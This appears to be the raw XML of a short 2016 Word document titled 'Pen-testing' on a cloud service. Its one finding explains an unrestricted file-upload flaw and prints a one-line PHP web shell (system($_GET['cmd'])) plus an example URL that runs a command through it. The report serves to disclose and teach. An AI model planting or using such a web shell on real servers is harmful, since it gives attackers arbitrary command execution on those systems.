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68994301"/>
        <w:docPartObj>
          <w:docPartGallery w:val="Cover Pages"/>
          <w:docPartUnique/>
        </w:docPartObj>
      </w:sdtPr>
      <w:sdtContent>
        <w:p w:rsidR="00B24C54" w:rsidRDefault="00B24C5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61CF2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24C54" w:rsidRDefault="00B24C5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Georgiana Manolache </w:t>
                                    </w:r>
                                  </w:p>
                                </w:sdtContent>
                              </w:sdt>
                              <w:p w:rsidR="00B24C54" w:rsidRDefault="00B24C5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24C54" w:rsidRDefault="00B24C5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Georgiana Manolache </w:t>
                              </w:r>
                            </w:p>
                          </w:sdtContent>
                        </w:sdt>
                        <w:p w:rsidR="00B24C54" w:rsidRDefault="00B24C5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4C54" w:rsidRDefault="00B24C5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B24C54" w:rsidRDefault="00B24C5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B24C54" w:rsidRDefault="00B24C5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24C54" w:rsidRDefault="00B24C5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4C54" w:rsidRDefault="00B24C5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Pen-testing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24C54" w:rsidRDefault="00B24C5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Cloud Service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B24C54" w:rsidRDefault="00B24C5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Pen-testing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24C54" w:rsidRDefault="00B24C5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Cloud Service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24C54" w:rsidRDefault="00B24C54">
          <w:r>
            <w:br w:type="page"/>
          </w:r>
        </w:p>
      </w:sdtContent>
    </w:sdt>
    <w:sdt>
      <w:sdtPr>
        <w:id w:val="6466293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24C54" w:rsidRDefault="00B24C54">
          <w:pPr>
            <w:pStyle w:val="TOCHeading"/>
          </w:pPr>
          <w:r>
            <w:t>Table of Contents</w:t>
          </w:r>
        </w:p>
        <w:p w:rsidR="00B24C54" w:rsidRDefault="00B24C54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22883" w:history="1">
            <w:r w:rsidRPr="00CF2EF2">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>File uploading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_Toc464122883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C54" w:rsidRDefault="00B24C5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24C54" w:rsidRDefault="00B24C54">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B24C54" w:rsidRDefault="00B24C54" w:rsidP="00B24C54">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="_Toc464122883"/>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>File uploading</w:t>
      </w:r>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:p w:rsidR="00B24C54" w:rsidRDefault="00B24C54" w:rsidP="00B24C54">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B24C54">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve">The problem with the </w:t>
      </w:r>
      <w:bookmarkStart w:id="1" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="1"/>
      <w:r w:rsidRPr="00B24C54">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>code is that there is no check regarding type of file being uploaded. Assuming that pictures/ is available in the web document root, an attacker could upload a file with the name:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00B24C54">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>malicious.php</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B24C54" w:rsidRDefault="00B24C54" w:rsidP="00B24C54">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B24C54">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve">Since this filename ends in </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00B24C54">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>".php</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00B24C54">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>" it can be executed by the web server. In the contents of this uploaded file, the attacker could use:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B24C54" w:rsidRDefault="00B24C54" w:rsidP="00B24C54">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>&lt;?php</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B24C54" w:rsidRDefault="00B24C54" w:rsidP="00B24C54">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>system($_GET['cmd']);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B24C54" w:rsidRDefault="00B24C54" w:rsidP="00B24C54">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>?&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0098229B" w:rsidRDefault="0098229B" w:rsidP="00B24C54">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0098229B">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>Once this file has been installed, the attacker can enter arbitrary commands to execute using a URL such as:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0098229B" w:rsidRDefault="0098229B" w:rsidP="00B24C54">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:color w:val="AA0000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EFEFEF"/>
        </w:rPr>
        <w:t>http://</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:color w:val="AA0000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EFEFEF"/>
        </w:rPr>
        <w:t>serveraddress</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:color w:val="AA0000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EFEFEF"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:color w:val="AA0000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EFEFEF"/>
        </w:rPr>
        <w:t>uploads</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:color w:val="AA0000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EFEFEF"/>
        </w:rPr>
        <w:t>/malicious.php?cmd=ls%20-l</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000E0EAB" w:rsidRDefault="0098229B" w:rsidP="00B24C54">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="31F7C0C7" wp14:editId="2A93A84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EAB" w:rsidSect="00B24C5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11D9F"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="E4C6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3C"/>
    <w:rsid w:val="000E0EAB"/>
    <w:rsid w:val="0098229B"/>
    <w:rsid w:val="009D4956"/>
    <w:rsid w:val="00B24C54"/>
    <w:rsid w:val="00F0063C"/>
    <w:rsid w:val="00F2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5AB5"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{BC6DEB0E-A615-499A-8B2A-2DBD4D8F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4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B24C5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4C5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24C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4C5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24C5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4C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A9E90-FB82-46C0-8D8C-86169E278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Pen-testing</dc:title>
  <dc:subject>Cloud Service</dc:subject>
  <dc:creator>Georgiana Manolache</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Georgiana Manolache</cp:lastModifiedBy>
  <cp:revision>4</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2016-10-13T09:45:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2016-10-13T10:00:00Z</dcterms:modified>
</cp:coreProperties>
</file>